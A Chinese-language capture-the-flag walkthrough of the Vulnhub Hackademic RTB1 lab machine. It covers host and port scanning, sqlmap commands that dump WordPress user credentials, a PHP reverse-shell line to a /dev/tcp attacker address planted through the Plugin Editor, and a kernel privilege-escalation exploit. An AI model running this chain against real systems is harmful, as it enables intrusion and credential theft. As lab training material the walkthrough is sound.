Vulnhub系列靶机 Hackadmeic.RTB1

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

Vulnhub系列靶机 Hackadmeic.RTB1_第1张图片

端口扫描

nmap -A -p- 192.168.80.143

Vulnhub系列靶机 Hackadmeic.RTB1_第2张图片

访问80端口

Vulnhub系列靶机 Hackadmeic.RTB1_第3张图片

使用指纹识别插件查看是WordPress

Vulnhub系列靶机 Hackadmeic.RTB1_第4张图片

根据首页显示的内容,点击target

Vulnhub系列靶机 Hackadmeic.RTB1_第5张图片

Vulnhub系列靶机 Hackadmeic.RTB1_第6张图片

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

Vulnhub系列靶机 Hackadmeic.RTB1_第7张图片

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

Vulnhub系列靶机 Hackadmeic.RTB1_第8张图片

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200   

Vulnhub系列靶机 Hackadmeic.RTB1_第9张图片

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

Vulnhub系列靶机 Hackadmeic.RTB1_第10张图片

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch 

Vulnhub系列靶机 Hackadmeic.RTB1_第11张图片

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

Vulnhub系列靶机 Hackadmeic.RTB1_第12张图片

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch 

Vulnhub系列靶机 Hackadmeic.RTB1_第13张图片

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

Vulnhub系列靶机 Hackadmeic.RTB1_第14张图片

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

Vulnhub系列靶机 Hackadmeic.RTB1_第15张图片

使用一个用户密码登录 NickJames密码:admin

Vulnhub系列靶机 Hackadmeic.RTB1_第16张图片

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

Vulnhub系列靶机 Hackadmeic.RTB1_第17张图片

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell


找到提交路径方式一:


wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

Vulnhub系列靶机 Hackadmeic.RTB1_第18张图片

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

Vulnhub系列靶机 Hackadmeic.RTB1_第19张图片

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

Vulnhub系列靶机 Hackadmeic.RTB1_第20张图片

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

Vulnhub系列靶机 Hackadmeic.RTB1_第21张图片

Vulnhub系列靶机 Hackadmeic.RTB1_第22张图片

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

Vulnhub系列靶机 Hackadmeic.RTB1_第23张图片

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

Vulnhub系列靶机 Hackadmeic.RTB1_第24张图片

查看完整路径

searchsploit -p linux/local/15285.c 

Vulnhub系列靶机 Hackadmeic.RTB1_第25张图片

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

Vulnhub系列靶机 Hackadmeic.RTB1_第26张图片

gcc 15285.c -o exp

# 将15285.c预处理、汇编、编译并链接形成可执行文件exp

#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名


Vulnhub系列靶机 Hackadmeic.RTB1_第27张图片

闯关成功!!!

你可能感兴趣的:(#,Vulnhub靶机系列,靶场,vulnhub)